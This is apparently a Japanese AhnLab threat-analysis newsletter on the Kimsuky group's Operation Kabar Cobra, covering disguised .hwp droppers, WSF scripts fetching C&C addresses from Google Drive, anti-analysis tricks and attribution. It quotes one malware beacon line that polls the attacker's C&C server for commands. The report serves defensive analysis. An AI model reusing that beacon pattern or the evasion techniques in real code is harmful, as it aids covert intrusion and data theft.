Vol.63 Kimsuky の帰還 今回のターゲットは?
|
|
|
- さみ やすこ
- 6 years ago
- Views:
Transcription
1 Vol.63 Kimsuky の帰還 今回のターゲットは?
2 Operation Kabar Cobra 詳細分析 Kimsuky の帰還 今回のターゲットは? 2019 年 1 月 7 日未明 韓国政府機関の出入り記者団を狙ったスピアフィッシングメールが配布された Kimsuky の帰還だった 正確に言えば帰還ではなく 2013 年に初回発見されて以降 韓国の機関を狙った主な標的型攻撃をリードした者らの動きが最近変化したのである かつて政治的目的のハッキングに集中していた攻撃者らは 最近韓国の一般企業と仮想通貨の分野までその攻撃範囲を拡げていることが分かった 2013 年に発見されて以来 彼らの動きを監視してきたアンラボセキュリティ対応センター (AhnLab Security Emergency response Center ASEC) では 最新事例から Kimsuky 攻撃を詳細分析したレポートを発表した Kimsuky( キムスキー ) は 韓国の機関を対象に攻撃する攻撃グループの中で最も有名だ Kimsuky という名称は 2013 年に同グループの攻撃ケースを初公開した海外のセキュリティベンダーが 奪取した情報を送信する電子メールアカウント名 キム スクヒャン (Kimsukyang) からもじったものである 当時の攻撃で使用した不正ファイルのコンパイルパスに 공격 완성 などハングル文字が含まれており 攻撃対象は韓国政府機関や対北朝鮮関連機関などであった 今回のコラムでは Kimsuky 攻撃グループ または Kimsuky グループ と表記した Kimsuky と Operation Kabar Cobra 2013 年に初めて表舞台に登場した Kimsuky 攻撃グループは 6 年経った今でも軍事関連や報道機関を対象に継続的な情報奪取を試みている 特に最近は第二次北米首脳会談を控えて 周辺国の反応情報を収集していることが確認された そんな中 金融と仮想通貨分野への攻撃情況が確認されたが これは長期化する対北朝鮮制裁により北朝鮮の経済状況がひっ迫し 政治的目的以外に金銭目当ての攻撃に出たものと解釈される Kimsuky グループの攻撃動向の変化について アンラボのアナリスト組織 ASEC では Operation Kabar Cobra の分析レポート を発表した 同レポートでは Kimsuky グループの標的型攻撃の最新事例の詳細分析と 攻撃の背後にいることを特定する技術的な根拠を説明している アンラボが一連の標的型攻撃の事例を分析したところ 一部で Cobra というファイル名と KABAR というミューテックス (Mutex) が使用されていることが確認され アンラボは Kimsuky グループが背後にいると推定される一連の最新の攻撃を Operation Kabar Cobra と命名した 2
3 [ 図 1] マルウェアに含まれている KABAR ミューテックス 下記 [ 表 1] は 2018 年 12 月から今年 1 月まで確認された Kimsuky グループのマルウェア ( ドロッパー Dropper) と攻撃対象のサマリーだ ただし表 に記載したファイルの発見時期と実際のファイル配布時期には差が生じることがある 発見時期 ファイル名 偽装形式 攻撃対象 事業計画書.hwp{ スペース }.exe.hwp 軍事関連分野 (ROTC) メディア権力移動 6-Netflix YouTube.hwp{ スペース }.exe.hwp メディア ( 政府機関出入り記者団 ) 中国 - 研究資料.hwp{ スペース }.scr.hwp 不明 [ 表 1] 攻撃対象別の悪意あるファイル名およびなりすましファイル形式 攻撃者はハングル (.hwp) 文書のアイコンに偽装する一方 ファイル名に二重拡張子を適用した また [ 表 1] にまとめたように 2つの拡張子の間にスペース (blank) を追加して ハングルファイルのように見せかけたファイルが実際には実行ファイル (.exe) またはスクリーンセーバーファイル (.scr) であることを巧妙に隠していた まずファイルをクリックすると 通常のハングルファイルのように見える画面が表示される 特に 内容もまた標的の業務と密接な内容に偽装させていた 主な機能と動作 新年に入り 1 月 7 日の未明に韓国政府の出入り記者団を対象に配布されたマルウェアのケースから Operation Kabar Cobra の特徴と機能を見てみよう 記者団に送信されたメールは TF 参考資料 という件名で TF 参考.zip の圧縮ファイルが添付された 添付ファイルには [ 図 2] のように 正常なハングル文書のように見える PDF ファイルと二重拡張子 (.hwp [ スペース ].exe) の悪性ファイルが含まれていた [ 図 2] 記者団に配布されたマルウェア これは [ 表 1] に記載した 2018 年の軍事機関を狙ったマルウェアと同じタイプで 2 件ともに偽装されたハングルファイル (.hwp) が悪意あるスクリプトと一緒に自動解凍 (WinRAR SFX) 方式で圧縮されていた この圧縮ファイルを実行すると解凍とともにマルウェアが実行されるが この時に実行された悪意あるスクリプトによって実質的な悪性行為が開始される この過程で攻撃者の Google ドライブから C&C 情報をダウンロードした [ 図 2] の悪意あるスクリプトの機能は次の通りだ 3
4 (1) 2.wsf 2.wsf はマルウェアを追加でダウンロードおよび実行する この際に必要な C&C 情報は攻撃者の Google ドライブからダウンロードした [ 図 3] 攻撃者の Google ドライブから C&C 情報をダウンロード [ 図 4] は攻撃者の Google ドライブにアップロードされたファイルであり マルウェアをダウンロードするための C&C 情報が含まれていた 本ファイル内容は攻撃者によっていつでも変更できる 一般的にダウンロード機能を実行するマルウェアは内部に固定された C&C 情報を持つため C&C サーバーがブロックされる場合 攻撃者はマルウェアを新たに製作して配布する必要があった しかし今回の攻撃事例では C&C サーバーがブロックされても攻撃者が自身の Google ドライブにアップロードしたファイル内容を変更するだけで マルウェアが新しい C&C サーバーと通信して継続的に悪意ある機能を遂行できた [ 図 4] 攻撃者の Google ドライブにアップロードされたファイル 一方 [ 図 5] の赤い表示のメールアドレス ([email protected]) は かつてフィッシングメール アカウントとして使用され これ に関して 2018 年教育分野サイバー安全センター ECSC から勧告を発表したこともある [ 図 5] 攻撃メールアカウントに対する 2018 セキュリティ勧告 4
5 2.wsf が追加でダウンロードしたマルウェア (brave.ct) は [ 図 6] のような過程を経て復号化され その過程で生成された Freedom.dll はパワーシェ ルを介して実行される この際に感染 PC が 64 ビットの Windows 環境であれば AhnLabMon.dll というファイルが作成 実行された ダウンロードしたマルウェア (brave.ct) ダウンロードしたマルウェア BASE64 復号化 rundll32.exe を利用して復号化した DLL マルウェア実行 [ 図 6] 追加ダウンロードされたマルウェアの実行過程 (2) 3.wsf 2.wsf 同様 3.wsf も攻撃者の Google ドライブにアップロードされたファイルから C&C 情報をダウンロードした しかし 2.wsf が単にマルウェアを追加ダウンロード 実行する悪意あるスクリプトであるのに対して 3.wsf は ファイル削除 / ダウンロード / アップロード コマンド実行 ログ送信 3.wsf アップデート C&C サーバーと送信するデータを BASE64 で暗号化または復号化するなど 多様な機能を実行する アンラボの分析当時は C&C サーバーと通信が可能だったので 3.wsf が C&C サーバーとどのように通信し 攻撃者が送信したコマンドは何だったかなどかなり詳細に把握できた 3.wsf は悪意ある機能を実行する前に C&C サーバーから自らのバージョン情報を受信して 現在の感染 PC で実行される自身のバージョンと比較する もし C&C サーバーから確認したバージョン情報が現バージョンよりも上位である場合は [ 図 7] のように最新バージョンの 3.wsf をダウンロード 実行した 3.wsf のバージョン情報受信 Version: PC で実行中の 3.wsf のバージョン new_ver: C&C で受信した 3.wsf のバージョン [ 図 7] 3.wsf バージョン情報の比較およびアップデート アンラボが分析した当時 同マルウェアが C&C サーバーから受信した 3.wsf の最新バージョンは 1.2 だった 3.wsf のバージョン情報 [ 図 8] C&C サーバーから収集された 3.wsf バージョン情報 5
6 バージョン情報を確認した後 3.wsf は C&C サーバーからコマンドを受信して実行するために 次のような形式でパラメータを構成する 以後 C &C サーバーに GET リクエストをして それに対する応答として C&C サーバーから BASE64 に暗号化されたコマンドを受信して実行する - C&C コマンドを受信するために C&C に送信される際のパラメータ形式 xhr.open(get,serverurl+/board.php?m=+mac_addr+&v=+version+ +TIMEOUT,false); xhr.send(); C&C サーバーに送信するパラメータ形式で 3.wsf のバージョンをパラメータとして設定する理由は 攻撃者が現在の感染 PC で実行中の 3.wsf バージョンを確認し バージョン別の感染 PC 状況を把握するためと思われる [ 図 9] は 3.wsf が C&C サーバーと通信した内容の一部であり 3.wsf が C&C サーバーからファイルダウンロードコマンドを受信して list.dll ファイルをダウンロードするプロセスである 変わった点は 3.wsf コードにはこのような過程を経てダウンロードした list.dll( または Cobra.dll) を実行するコードが存在しない点だ しかし 2.wsf がダウンロードした Freedom.dll( または AhnLabMon.dll) が同じ list.dll(cobra.dll) をダウンロード 実行することが確認された 2.wsf がダウンロードした Freedom.dll(AhnLabMon.dll) は DeleteUrlCacheEntryA() 関数を呼出してダウンロードの痕跡を削除する これは攻撃の痕跡をトレースできないようにするためだった [ 図 9] C&C サーバーを通じるマルウェアダウンロード また [ 図 9] のような過程からダウンロードされる list.dll( または Cobra.dll) は 感染 PC のシステム情報とフォルダーおよびファイルリストを収集し 圧縮ファイルをコピーするなど機能を実行する 攻撃者は list.dll( またはCobra.dll) から収集した PC 情報を利用して感染 PC がアナリストのシステムであるかどうか確認する もし分析用システムと分かったら分析ツールを強制終了して偽のフラグ (False Flag) を埋め込むなど アナリストの追跡を妨害していた マルウェアのプロファイル その背後にあるもの [ 表 1] の軍事関連とメディア分野への標的型攻撃が発生した時期に 当分野とは関連がないように見える韓国のアパレルメーカーと仮想通貨を狙ったマルウェアが配布された だがこれらのマルウェアと前述の軍事機関を狙ったマルウェアとの類似性が確認された すべて同じ C&C サーバーから配布されたのである また関連ファイルの TimeStamp を分析した結果 攻撃者は少なくとも 2 年前から断続的に亜種を製作したとみられる 6
7 これによりアンラボのアナリストらはマルウェアをプロファイリングし アパレルメーカーおよび仮想通貨を狙ったマルウェアもまた Operation K abar Cobra に関連しており その背後に Kimsuky グループがいるという説を明白にした 次はアンラボが確保した様々な技術的根拠を要約した ものである (1) マルウェア配布方式の類似性基本的にマルウェアを配布する方式が同じだった 攻撃対象を騙すための偽装用文書ファイルとともに悪意あるスクリプトが WinRAR SFX(Self-ext racting archive 自動解凍 ) 方式で圧縮されていた 仮想通貨を狙った攻撃には イーサネットリウムの取引履歴に偽装した Excel ファイルを利用しており アパレルメーカーを狙った攻撃には [ 図 10] のように中国語 ( 簡体字 ) で作成した見積書に偽装した Excel ファイルを使った [ 図 10] 見積書になりすました悪質なエクセルファイル ただし C&C 情報をダウンロードする方法には差があった 軍事機関とメディアを対象にした攻撃では攻撃者の Google ドライブにアップロードさ れたファイルで C&C 情報をダウンロードしたのに対し 仮想通貨を狙った攻撃では悪質なスクリプト (2.wsf 3.wsf) で C&C 情報をダウンロード する過程は省略され serverurl いうと変数に C&C サーバーが明示されていた (2) シングル IP - 同じマルウェア配布先および C&C サーバー分析過程で確認したマルウェアの配布地と C&C サーバーは 一つの IP アドレスに接続されるが 当 IP には多数の URL が接続されていた 攻撃者が使用した多数の URL は ほとんど韓国の有名ポータルサイトと Google マイクロソフト そしてアンラボを含む韓国の主要セキュリティ企業名を盗用していた 攻撃者はこれらの URL をマルウェアの配布やフィッシングサイト C&C サーバーとして使用した (3) 同じシェルコード Kimsuky グループが過去の攻撃で使用した悪質なハングルファイルと 2018 年に使用したハングルファイルを分析したところ [ 図 11] のように同じシェルコードが存在していた [ 図 11] の左はこれらの文書ファイルに存在するシェルコードの類似性を比較したもので 灰色領域が同じコードであることを意味する 7
8 [ 図 11] 2014 に攻撃に使用されたハングルファイル ( 上 ) と 2018 年のハングルファイル ( 下 ) のシェルコードを比較 (4) 追加生成されたマルウェアの同じ動作 2017 年と 2018 年にそれぞれ作成された不正ハングルファイルは すべて core.dll という悪性ファイルを生成した 同ファイルによって作成された core.dll を比較すると 自身を実行するファイルは rundll32.exe と regsvr32.exe でそれぞれ異なるが コードは同じだった もちろんこれだけで二つの悪意あるファイルを Kimsuky グループのものと断定するには不十分だ だがこの二つの core.dll が自身を実行するとき ロードされたプロセスが notepad.exe であれば終了する同じ方式のコードが確認された またこれらのマルウェアが 暗号化された文字列を復号化する際に使用する復号化キーパターンも 4バイトずつ計 32バイトのパターンで同じだった この復号化キーを使用して暗号化された文字列を復号化するためのコードは 同じではないものの非常に似ていた またこれらの事例で確認された悪質なスクリプトコードと動作方法は 前述の最新の攻撃ケースと同じだった Kimsuky から抜け出せるか これまで説明したように 悪意あるハングルファイルに存在する同じシェルコード 同じコードと動作の悪質なスクリプト 同じコードと動作のマルウェアを追加生成 同じ C&C サーバー接続 IP などを証拠に 最近韓国機関を対象に展開された Operation Kabar Cobra の背後で Kims uky グループが後押ししている可能性は非常に高い Kimsuky グループは暗号化ファイルを利用してセキュリティソリューションの検知を迂回する一方で 自己削除 可変ファイル名の使用など多様な手法を駆使してアナリストの追跡から逃れている このように高度化した Kimsuky グループが 2014 年に使用して公開されたハングルの脆弱性とシェルコードを最近になって再使用した理由は何だろう これは標的がいまだに古いバージョンのハングルプログラムを セキュリティ更新プログラムも適用しないまま使用中であることを彼らが把握していたためだろう 標的型攻撃の対象がパッチ管理に徹底しなければならない理由もまさにここにある そして攻撃の被害を最小限に抑えるため 侵入の痕跡をできるだけ迅速かつ正確に収集 検知する方法を確立しなければならない Kimsuky グループをはじめ韓国機関を狙う多数の標的型攻撃が継続的に発生している 政治的な協力関係とは別にサイバー攻撃への継続的な警戒が必要だ 特に複数の攻撃グループの動きを監視 対応するため 国家機関と企業 セキュリティ企業間の情報共有など緊密な連携が求められている アンラボセキュリティ対応センター (ASEC) が発表した Operation Kabar Cobra の分析レポート全文は 次のリンクから確認できる Operation Kabar Cobra の分析レポートをダウンロードする ( 現在は韓国語版のみ ) 8
9 アンラボとは株式会社アンラボは 業界をリードする情報セキュリティソリューションの開発会社です 1995 年から弊社では情報セキュリティ分野におけるイノベーターとして最先端技術と高品質のサービスをご提供できるように努力を傾けてまいりました 今後もお客様のビジネス継続性をお守りし 安心できるIT 環境づくりに貢献しながらセキュリティ業界の先駆者になれるよう邁進してまいります アンラボはデスクトップおよびサーバー 携帯電話 オンライントランザクション ネットワークアプライアンスなど多岐にわたる総合セキュリティ製品のラインナップを揃えております どの製品も世界トップクラスのセキュリティレベルを誇り グローバル向けコンサルタントサービスを含む包括的なセキュリティサービスをお届け致します 東京都港区芝 4 丁目 13-2 田町フロントビル 3 階 TEL: ( 代 ) 2019 AhnLab, Inc. All rights reserved.
Vol.71 政府機関を狙う連続ターゲット攻撃の目的は?
2019.11 Vol.71 政府機関を狙う連続ターゲット攻撃の目的は? THREAT ANALYSIS State Targeted Attack 政府機関を狙う連続ターゲット攻撃の目的は? 日韓輸出規制 北朝鮮の相次ぐミサイル発射 ロシア軍用機の領空侵害など韓国を取り巻く周辺国との対立が深刻化していた 7 月 再び韓国政府機関を狙った標的型攻撃が発見された アンラボがサンプルを分析したところ 実はこの攻撃が
Vol.62 コインマイナーが狙う仮想通貨 Top4
2019.2 Vol.62 コインマイナーが狙う仮想通貨 Top4 2018 年マイニング マルウェア動向 コインマイナーが狙う仮想通貨 Top4 2018 年は コインマイナーの年 といっても過言ではない 2018 年アンラボが集計したコインマイナーマルウェアのサンプルは 2017 年比 2,254% 増という爆発的な数値を記録した このうち不特定多数に配布されるマルウェアの特性から マイニング
FOCUS IN-DEPTH - URSNIF ANALYSIS アースニフ ステガノグラフィーで金融圏を攻撃 金融情報を奪取するマルウェアのアースニフ (Ursnif) が再び活動を再開した アースニフは金融圏で最も頻繁に発見されるマルウェアの一つであり 初期は北米 ヨーロッパ オーストラリアなど
2018.12 Vol.60 アースニフ ステガノグラフィーで金融圏を攻撃 FOCUS IN-DEPTH - URSNIF ANALYSIS アースニフ ステガノグラフィーで金融圏を攻撃 金融情報を奪取するマルウェアのアースニフ (Ursnif) が再び活動を再開した アースニフは金融圏で最も頻繁に発見されるマルウェアの一つであり 初期は北米 ヨーロッパ オーストラリアなどで活動したが 最近は日本の金融圏に多大な被害をもたらしている
Vol.66 信頼できるマルウェア (?) に隠された真実
2019.6 Vol.66 信頼できるマルウェア (?) に隠された真実 正当なデジタル証明書で署名された悪性ファイルの増加 信頼できるマルウェア (?) に隠された真実 発行先の識別情報をベースに信頼性を高めるためファイルにデジタル署名をする過程を コードサイニング (Code Signing) という ファイルの作成者は認定された認証機関 (CA Certificate Authority) からデジタル証明書
はじめに (1) フィッシング詐欺 ( フィッシング攻撃 ) とは フィッシング詐欺とは インターネットバンキング ショッピングサイト等の利用者のアカウント情報 (ID パスワード等 ) や クレジットカードの情報等を騙し取る攻撃です 典型的な手口としては 攻撃者が本物のウェブサイトと似た偽のウェブ
参考資料 文書ファイルを悪用した フィッシング詐欺の手口に関する 注意点 2017 年 10 月 26 日 1 はじめに (1) フィッシング詐欺 ( フィッシング攻撃 ) とは フィッシング詐欺とは インターネットバンキング ショッピングサイト等の利用者のアカウント情報 (ID パスワード等 ) や クレジットカードの情報等を騙し取る攻撃です 典型的な手口としては 攻撃者が本物のウェブサイトと似た偽のウェブサイト
マルウェアレポート 2017年12月度版
バンキングマルウェアの感染を狙った攻撃が日本に集中 ショートレポート 1. 12 月の概況について 2. バンキングマルウェアの感染を狙った攻撃が日本に集中 3. ランサムウェアのダウンローダーを数多く確認 1. 12 月の概況について 2017 年 12 月 1 日から 12 月 31 日までの間 ESET 製品が国内で検出したマルウェアの比率は 以下のと おりです 国内マルウェア検出数の比率
Technical Report 年 8 月 31 日 株式会社セキュアソフト 注意喚起 : バンキングトロージャンに感染させるマルウェア付きメール拡散について 1. 概要最近インターネットバンキングなど金融機関関連情報の窃取を目的としたマルウェア付きメールが 日本国内で多数配
2017 年 8 月 31 日 株式会社セキュアソフト 注意喚起 : バンキングトロージャンに感染させるマルウェア付きメール拡散について 1. 概要最近インターネットバンキングなど金融機関関連情報の窃取を目的としたマルウェア付きメールが 日本国内で多数配信されています このようなマルウェアを特に バンキングトロージャン と称します バンキングトロージャンに感染すると 利用者のログイン パスワードなどの情報を窃取し利用者が
LINE WORKS 管理者トレーニング 4. セキュリティ管理 Ver 年 6 月版
LINE WORKS 管理者トレーニング 4. セキュリティ管理 Ver 4.1.0 2018 年 6 月版 4. セキュリティ管理 4.1 セキュリティ機能 4.2 ネットワークセキュリティ 4.3 アカウントセキュリティ 4.4 モバイルセキュリティ 4.5 ファイルセキュリティ 2 3 4.1 セキュリティ機能 管理画面のセキュリティ設定 4 セキュリティ機能 (1) [ セキュリティ ] [
マルウェアレポート 2018年3月度版
インターネットバンキングの認証情報窃取を狙ったマルウェアを多く検出 ショートレポート 1. 3 月の概況について 2. バンキングマルウェア Ursnif 感染を狙った添付メール攻撃 3. 偽のシステム警告を表示する詐欺サイト 1. 3 月の概況について 2018 年 3 月 1 日から 3 月 31 日までの間 ESET 製品が国内で検出したマルウェアの種類別の割合は 以 下のとおりです 国内マルウェア検出数の比率
CloudEdgeあんしんプラス月次レポート解説書(1_0版) _docx
クラウド型セキュリティ対策サービス Cloud Edge あんしんプラス 月次レポート解説書 第 1.0 版 日本事務器株式会社 改版履歴 版数日付変更内容 1.0 2016/03/07 新規作成 2 目次 1. サービス概要............ 4 1.1. CLOUD EDGE あんしんプラスとは... 4 2. 月次レポート解説............ 5 2.1. VBBSS がインストールされているクライアントの概要...
ログを活用したActive Directoryに対する攻撃の検知と対策
電子署名者 : Japan Computer Emergency Response Team Coordination Center DN : c=jp, st=tokyo, l=chiyoda-ku, Japan Computer Emergency Response [email protected], o=japan Computer Emergency Response Team
感染条件感染経路タイプウイルス概要 Authplay.dll (aka AuthPlayLib.bundle) を利用する Adobe Reader 9.x ~ より前のバージョンと 10.x から 上記動作環境に一致した環境下で当該 PDF タイプウイルスを実行することで
1. Exploit.PDF.CVE-2010-2883 一般向け情報 1.1 Exploit.PDF.CVE-2010-2883 の流行情報 2011 年 12 月 17 日 朝鮮民主主義人民共和国 ( 北朝鮮 ) の金正日氏の訃報に便乗して発生したウイルスである 今回解析する Exploit.PDF.CVE-2010-2883 は PDF 形式のウイルスであり メールや Web サイトに掲載されることで被害が拡大したと想定される
P.2 もくじ 8. ファイルのアップロードとダウンロード 8-. ファイルのアップロード 8-2. ファイル指定でアップロード 8-3. Zip 解凍アップロード 8-4. ドラッグ & ドロップで一括アップロード 8-5. ファイルのダウンロード 9. ファイルの送信 ( おすすめ機能 ) 9-
Biz ストレージファイルシェアユーザー操作マニュアル ~MyDisk 機能 ~ ご不明な点はサイト内の よくある質問 をご覧ください 202 年 4 月 ShareStage ASP サービス よりサービス名称を変更いたしました 208 年 3 月 22 日更新 NTT コミュニケーションズ株式会社 P.2 もくじ 8. ファイルのアップロードとダウンロード 8-. ファイルのアップロード 8-2.
Microsoft PowerPoint _VL-CD2xx バージョンアップ手順(汎用版).pptx
センサーカメラ VL CD2xx シリーズ バージョンアップ手順 対象機種 VL CD265/CD235/CD215 2015 年 1 月 5 日 パナソニックシステムネットワークス株式会社セキュリティシステム事業部グローバルソリューショングループ FE チーム ( グローバル CS) 1 改版履歴 発行日内容詳細 2015/1/5 初版 - 2 必要なもの PC( パソコン ) LAN ケーブル
WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると 以下のようなデータを使用できないように暗
WannaCry 2017 年 5 月 21 日 マクニカネットワークス株式会社 本資料は 2017 年 5 月 21 日現在の情報を基に作成しております WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると
Logstorage for VISUACT 標的型サイバー攻撃 対策レポートテンプレート
統合ログ管理システム Logstorage 標的型メール攻撃分析 監視例 インフォサイエンス株式会社 プロダクト事業部 Infoscience Corporation www.infoscience.co.jp [email protected] Tel: 03-5427-3503 Fax: 03-5427-3889 標的型メール攻撃とその対策 標的型メール攻撃の本質はメールや添付マルウェアにあるのではなく
マルウェアレポート 2018年1月度版
マイニングマルウェア JS/CoinMiner の爆発的流行 ショートレポート 2018 年 1 月マルウェア検出状況 1. 1 月の概況について 2. マイニングマルウェア JS/CoinMiner の爆発的流行 3. 脆弱性を悪用した攻撃の種類が増加 1. 1 月の概況について 2018 年 1 月 1 日から 1 月 31 日までの間 ESET 製品が国内で検出したマルウェアの種類別の割合は
1. インストール方法 STEP 1 ダウンロードしたファイルを任意の場所に解凍します Windows 標準の機能を用いて解凍する場合は ファイルを選択して 右クリックメニューから [ すべて展開 ] を選択し 表示されたメッセージに従って解凍します STEP 2 解凍されたフォルダにある Setu
スマホで議事録 取扱説明書 本取扱説明書で記載している画像は Windows 10 ( 一部 :Windows 7) で取得したものです OS の種類によっては 異なる画面イメージになります - 1 - 1. インストール方法 STEP 1 ダウンロードしたファイルを任意の場所に解凍します Windows 標準の機能を用いて解凍する場合は ファイルを選択して 右クリックメニューから [ すべて展開
システム設計書
二松學舍大学二松メール (Gmail) 学生向け移行マニュアル バージョン 2.1 発効日 改訂日 2013 年 3 月 29 日 二松学舎大学情報センター i 目次 1. 新二松メール (Gmail) ログイン ログアウト方法...1 1.1. 新二松メール (Gmail) ログイン方法... 1 1.2. 新二松メール (Gmail) ログアウト方法... 4 2. メールデータ移行方法...5
OP2
第 66 回スクエア free セミナー 可視化から始めるサイバー攻撃対策 サイバー攻撃の状況を可視化する無料サービスのご紹介 株式会社 OPEN スクエア 田中昭造三好文樹 2016/5/20 1 IoT の普及により深刻かするサイバー攻撃 平成 27 年におけるサイバー空間をめぐる脅威の情勢について 2016 年 3 月 17 日警視庁発表より 平成 27 年中に警察が連携事業者等から報告を受けた標的型メール攻撃は
マルウェアレポート 2017年9月度版
マイニングマルウェアに流行の兆し ショートレポート 1. 9 月の概況について 2. CCleaner の改ざん被害 3. マイニングマルウェアの流行 1. 2017 年 9 月の概況 2017 年 9 月 1 日から 9 月 30 日までの間 ESET 製品が国内で検出したマルウェアの比率は 以下のとおり です 国内マルウェア検出数 (2017 年 9 月 ) 1 9 月は VBS(VBScript)
1. 標的型サイバー攻撃への取り組み 2. 標的型攻撃メールの見分け方 3. 添付ファイルの見分け方 4. 標的型攻撃メールを見つけたら Copyright 2015 独立行政法人情報処理推進機構 1
標的型攻撃メールの傾向と事例分析 2015/ 05 独立行政法人情報処理推進機構 (IPA) 技術本部セキュリティセンター 伊東宏明 Copyright 2015 独立行政法人情報処理推進機構 1. 標的型サイバー攻撃への取り組み 2. 標的型攻撃メールの見分け方 3. 添付ファイルの見分け方 4. 標的型攻撃メールを見つけたら Copyright 2015 独立行政法人情報処理推進機構 1 2.1
ICLT 操作マニュアル (2011 年 05 月版 ) Copyright 2011NE 東京株式会社 All Rights Reserved
ICLT 操作マニュアル (2011 年 05 月版 ) 目次 0. はじめに 1. テンプレートの準備 1.1 エクセルファイルの準備 1.2 タグを作成する 1.3 エクセルファイルの表示調整 2.PC へテンプレートを追加 3.iPad での NEICLT の操作 3.1 入力者の操作 3.1.1 入力者のログイン 3.1.2テンプレートを更新する 3.1.3 チェックリスト新規作成 3.1.4
誓約書の同意 4 初回のみ 下記画面が表示されるので内容を確認後 同意する ボタンをクリック 同意していただけない場合はネット調達システムを使うことができません 参照条件設定 5 案件の絞り込み画面が表示されます 5-1 施工地域を選択して 施工地域選択完了 ボタンをクリック - 2 -
ネット調達システム簡易マニュアル 協力会社編 システムの起動 ~ 案件参照 ~ 見積提出 ログイン 1OC-COMET にログインします 2 左側のメニューより 関連システム連携 ( 見積回答 S 他 ) をクリック 3 ネット調達システム をクリック - 1 - 誓約書の同意 4 初回のみ 下記画面が表示されるので内容を確認後 同意する ボタンをクリック 同意していただけない場合はネット調達システムを使うことができません
PC にソフトをインストールすることによって OpenVPN でセキュア SAMBA へ接続することができます 注意 OpenVPN 接続は仮想 IP を使用します ローカル環境にて IP 設定が被らない事をご確認下さい 万が一仮想 IP とローカル環境 IP が被るとローカル環境内接続が行えなくな
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Remote 利用... - 9-2.1. 接続確認... - 9-2.2. 自動接続... - 11-2.3. 編集... - 13-2.4. インポート... - 16-2.5. 削除... - 18-2.6. 参考資料 ( 接続状況が不安定な場合の対処方法について )... - 19-2.6.1. サービスの再起動...
共有フォルダ接続手順 1 共有フォルダ接続ツールのダウンロード 展開 CSVEX のトップページから共有フォルダ接続ツールの zip ファイルをダウンロードします ダウンロードした zip ファイルを右クリックして すべて展開 を選択します (Windows 環境では zip ファイルを解凍しなくて
共有フォルダ接続手順 (Windows 環境 ) 本手順書では 共有フォルダ接続ツールの設定 実行方法を説明します PC から CSVEX の共有フォルダ (WebDAV) に接続すれば いつでもお手元に最新のファイル一式が揃っている状態となり 日々のファイルダウンロード作業が不要となります 共有フォルダ接続ツールは CSVEX の共有フォルダに簡単に接続するためのツールです 必要環境 Windows
RICOH Device Manager Pro バックアップ/バージョンアップ作業手順書
RICOH Device Manager Pro バックアップ / バージョンアップ作業手順書 1. 概要 本手順書は DeviceManagerPro 機器アドレス帳データ確認用ツール操作手順書.pdf での作業を実施する前に実施する RICOH Device Manager Pro( 以降 DMPro と表現 ) のバージョンアップとそれに伴うバックアップの作業手順を記載した手順書です page
製品概要
InterScan Web Security as a Service (IWSaaS) ご提案書 トレンドマイクロ株式会社 製品概要 ネット利用状況の変化 Employees 多種多様な Web アプリケーション Web メール オンラインショッピング オンライントレード 業務系ソフト etc 私的な SNS サイトを利用したいユーザと 仕事に関係のある SNS のみを許可したい管理者 Web 2.0
Microsoft Word - メールでの送受信(添付方法).doc
メールでのデータの送受信 インターネットが可能な環境であればメールソフトを使用し データのやりとりが可能です ここでは パソコンに標準でインストールされているマイクロソフト社のメールソフト Outlook Express ( ここでは Ver6.0) での操作方法を簡単にご紹介します 詳細は 書店で Outlook Express に関する解説書が幅広く出ているので そちらをご覧ください また その他のメールソフトに関しての操作方法は各ソフトの操作説明をご覧下さい
目次 1. テンプレートの準備 1.1 エクセルファイルの準備 1.2 タグを作成する 1.3 エクセルファイルの表示調整 2.PC へテンプレートを追加 3.iPad での ICLT の操作 3.1 入力者の操作 入力者のログイン テンプレートを更新する チェッ
ICLT 操作マニュアル ASP 版 (2011 年 06 月版 ) 目次 1. テンプレートの準備 1.1 エクセルファイルの準備 1.2 タグを作成する 1.3 エクセルファイルの表示調整 2.PC へテンプレートを追加 3.iPad での ICLT の操作 3.1 入力者の操作 3.1.1 入力者のログイン 3.1.2 テンプレートを更新する 3.1.3 チェックリスト新規作成 3.1.4 チェックリストの保存
SAMBA Stunnel(Windows) 編 1. インストール 1 セキュア SAMBA の URL にアクセスし ログインを行います xxx 部分は会社様によって異なります xxxxx 2 Windows 版ダウンロード ボ
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Stunnel 利用... - 8-2.1. 接続確認... - 8-2.2. 編集... - 11-2.3. インポート... - 14-2.4. 削除... - 15-2.5 フォルダショートカットの作成... - 16-3. 動作環境... - 18-4. 参考資料 ( 接続状況が不安定な場合の対処方法について
仙台 CTF2018 セキュリティ技術競技会 (CTF) 問題解説復習問題 平成 30 年 11 月 10 日 仙台 CTF 推進プロジェクト 五十嵐良一 Copyright (C) 2018 Sendai CTF. All Rights Reserved.
仙台 CTF2018 セキュリティ技術競技会 (CTF) 問題解説復習問題 平成 30 年 11 月 10 日 仙台 CTF 推進プロジェクト 五十嵐良一 Copyright (C) 2018 Sendai CTF. All Rights Reserved. https://www.sendai-ctf.org/ Lab.01 P 2 問題 1 [ シナリオ ] ある日 営業所の社員用パソコンのウイルス対策ソフトから
セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェ
2014.10 Vol.10 Bash 脆弱性を詳細分析 セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェルシ ョック ShellShock と呼ばれ
Microsoft PowerPoint - Logstorage镣撺ㅂㅅ㇯_for_SKYSEA_Client_View_ pptx
Logstorage 連携パック for SKYSEA Client View ご紹介資料 インフォサイエンス株式会社プロダクト事業部 Infoscience Corporation www.infoscience.co.jp [email protected] Tel: 03-5427-3503 Fax: 03-5427-3889 統合ログ管理システム Logstorage 2 統合ログ管理システム
